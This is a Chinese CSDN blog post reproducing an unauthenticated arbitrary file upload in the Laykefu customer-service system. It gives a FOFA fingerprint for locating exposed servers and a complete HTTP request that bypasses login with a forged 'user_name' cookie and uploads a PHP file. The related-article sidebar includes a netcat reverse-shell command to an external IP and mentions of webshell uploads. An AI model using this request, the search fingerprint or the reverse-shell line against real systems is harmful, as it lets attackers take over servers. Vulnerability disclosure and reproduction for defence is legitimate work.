Laykefu客服系统任意文件上传漏洞

最新推荐文章于 2024-04-14 10:07:26 发布
最新推荐文章于 2024-04-14 10:07:26 发布
阅读量470 收藏 5
点赞数 4
分类专栏: 漏洞复现 文章标签: sql 数据库 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/135838295
版权

Laykefu客服系统任意文件上传漏洞

1.漏洞介绍

Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台,未经身份验证的攻击者可利用此问题,上传后门文件,获取服务器权限

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
-

4.检索特征

FOFA:icon_hash=“-334624619”
在这里插入图片描述

5.POC
POST /admin/users/upavatar.html HTTP/1.1
Host: xxx.xxx.xxx
Content-Length: 194
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Origin: http://xxx.xxx.xxx
Referer: http://xxx.xxx.xxx/admin/users/edituser/id/1.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

在这里插入图片描述
在这里插入图片描述

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
专栏目录
Laykefu客服系统 任意文件上传漏洞复现
0xSec
01-21 904
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台,未经身份验证的攻击者可利用此问题,上传后门文件,获取服务器权限。
Create Laykefu客服系统任意文件上传漏洞(含批量验证poc)
weixin_43567873的博客
04-01 143
Create Laykefu客服系统任意文件上传漏洞(含批量验证poc)
任意上传漏洞演示
03-07
讲述了任意上传漏洞以及一句话木马:
layui文件上传,后台上传文件成功,但是前端一直跳到error方法,提示上传失败信息,
violin256的博客
05-04 4097
出错:上传文件成功,但是前端一直跳到error方法,提示上传失败信息,本例子原后台返回数据为string类型,前端Ajax异步请求,控制层为@@RestController。 解决办法:后台返回类型改为Map<String,Object> 代码为 //上传图片 @PostMapping("/upload") public Map<String,Object> imgStri...
CLTPHP 5.5.3 任意文件上传漏洞
weixin_50464560的博客
09-16 1211
一、漏洞简介 CLTPHP采用ThinkPHP开发,后台采用Layui框架的内容管理系统。 二、漏洞影响 CLTPHP 5.5.3 三、复现过程 找到一个注册界面 随便注册一个用户,登陆后在设置里找到一个上传点 上传我们的一句话木马 查看返回包,上传成功 访问失败,猜测返回路径可能不是绝对路径 通过报错信息查找关键词,发现存在public目录 那再把public加上再试试~ success! 菜刀连接 PoC payload.py #!/usr/bin/python #-*- coding:
layui上传文件php上传接口异常,layui文件上传组件“请求上传接口出现异常”问题解决方案...
weixin_32327615的博客
04-06 892
这是一个悲伤的故事,以前开发项目用过很多次这个组件,这次使用了Token,于是报了一些莫名其妙的错误,来复盘一下,警示自己!刚开始接触layui的同学们肯定经常会看到这个错误下面我们对这个异常的处理方案来总结一下:(1)Controller层的接口返回格式不对这是最常见的错误,我们先看一下官方文档的接口要求这里注意一下最后两段话,可以不按照此格式,但是必须是JSON字符串,绝大多数情况在Contr...
shmilylbelva-laykefu-master.zip
05-18
在实际应用中,"laykefu"客服系统可以广泛应用于电商、金融、教育等多个行业,帮助企业构建起强大的在线服务体系,增强客户满意度,提升业务效率。对于开发者来说,通过学习和研究这个项目,不仅可以掌握ThinkPHP和...
基于workerman+gatawayworker+thinkphp5搭建的webim客服系统,web客服即时通讯
shmilylbelva的博客
04-29 2454
laykefu thinkphp5+Gatewayworker搭建的web客服系统 体验地址:http://laykefu.guoshanchina.com github仓库:https://github.com/shmilylbelva/laykefu 1.客户端接入 1、添加laykefu.css样式文件 <link href="http://laykefu.guoshanchi...
ThinkPHP v5.0.24 完整版
10-22
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,经历了三年多发展的同时,在社区...
【二开版】大魔王7.0-PHP来客云在线客服系统
C站全栈优质创作者、阿里云受邀博主专家,喜欢结识新伙伴寻找志同道合的朋友,欢迎一起探讨学习
08-04 5417
以上就是今天的【二开版】大魔王7.0-PHP来客云在线客服系统,如需下载请在文章首页下载资源,如果需要搭建指导请联系我,有偿安装🍋希望你能喜欢我的其他作品《记一次云之家签到抓包》《记一次视频抓包m3u8解密过程》《抓包部分软件时无网络+过代理检测 解决办法 安卓黄鸟httpcanary+vmos》《Python】记录抓包分析自动领取芝麻HTTP每日免费IP(成品+教程)》《某课抓包视频 安卓手机:黄鸟+某课app+VirtualXposed虚拟框架》《Python爬虫脚本项目实战》
WeLive免费在线客服系统
11-01
WeLive免费在线客服系统,环境需求php mysql
tp5+layui后台基础框架.zip
05-27
最新版本下载地址https://github.com/taoyonbin/php-layui-admin 基本的后台管理框架系统,可以在该基础上进行二次开发,也可以自行改装,内置权限管理/菜单管理/角色管理/管理员管理/系统信息/管理员信息修改/图片上传。 需要注意点:1端口设置,xampp版本没有测过,之前出现版本问题也会导致运行不了 2.数据库的名字和配置文件的名字 3.图片的端口地址
PHP+JQUERY多用户在线客服系统源码
03-15
PHP+JQEURY实现的多用户在线客服系统,此下载包是源码,早前上传的是加密后的,现在开放给大家使用。可实现多用户共享一个客服系统,即可同时支持为N个网站做在经客服,互不干扰。
实战案例-Fofa拿下pikachu服务器保姆级别教程(文件上传下载&webshell)
最新发布
jnszstmei的博客
04-14 1324
输入127.0.0.1 & 1.exe -e cmd 47.109.189.205 5566(47.109.189.205为自己服务器的ip),拿到服务器的控制权
php常见漏洞
qq_36232967的博客
06-20 509
此外,及时更新和修复依赖组件和框架也是保持应用程序安全的关键。会话劫持和固定:会话劫持是指攻击者窃取有效用户会话标识符,然后冒充合法用户访问系统。会话固定是指攻击者在不合法获取会话标识符的情况下,通过伪造会话标识符欺骗服务器信任他们。文件包含漏洞:文件包含漏洞出现在代码中使用用户可控参数来加载外部文件的情况下,攻击者可以通过构造恶意路径或文件名来加载任意文件并执行其中的代码,从而导致服务器被入侵。跨站脚本攻击(XSS):XSS 漏洞是指攻击者通过在网页中注入恶意脚本,从而在用户浏览器中执行恶意代码。
layui框架实战案例(22):多附件上传实战开发实录(php后端、文件删除、数据库删除)
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
06-19 1154
在发布文章时,可以将附件上传至富文本编辑器,但是对文件删除时,无法将其从服务器删除。为了便于附件的管理,将附件上传管理,进行单独的项目开发。Layui是一个前端UI框架,它提供了多附件上传的组件,可以方便地在前端实现多附件上传功能。Layui多附件上传组件的使用方法非常简单,只需要加载相关的js和css文件,然后在HTML中定义上传的元素即可。Layui的多附件上传组件默认支持最多同时上传6个文件,可以通过设置number属性值来改变同时上传的文件数量。
客服系统上传漏洞导致服务器被拿下
weixin_30852451的博客
12-16 1123
今天收到某白帽子报告说通过某漏洞把我们的服务器拿下了,一下子让已经忙碌不堪的我更加忙碌了,在这里就只做简单的总结: 1、 原因:YS使用的某kf系统存在上传漏洞,在网上没有搜到任何信息,可能是0day,也可能是未公开的(漏洞细节暂不公开)。 2、 危害:白帽子通过该漏洞上传木马拿下了我们的kf服务器。 3、 风险分析:由于该业务相对独立,且用到了第三方小厂商的软件,当初就感觉风...
PHP在线客服系统平台源码(完全开源的网页在线客服系统
zxkmyy的博客
11-06 5462
  在线客服系统是一个使用PHP、JavaScript和CSS开发的即时网页聊天咨询系统。该项目包含管理员和用户端。管理员端管理所有的管理,如编辑站点内容、管理提供者和预订,管理员在这个系统的管理中起着重要的作用。      在线客服系统源码及演示:zxkfym.top      对于用户部分,用户可以浏览主页、关于和服务。用户可以是顾客谁需要家庭服务或服务提供商提供家庭服务的人。为了注册为服务提供商,用户必须填写注册表格。然而,要将服务提供商作为客户预订,用户可以先搜索可用的服务提供商,然后再进行预订。该
php常见的45个漏洞及解决方案
qqrrjj2011的博客
03-06 3229
php常见45个漏洞及解决方案
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值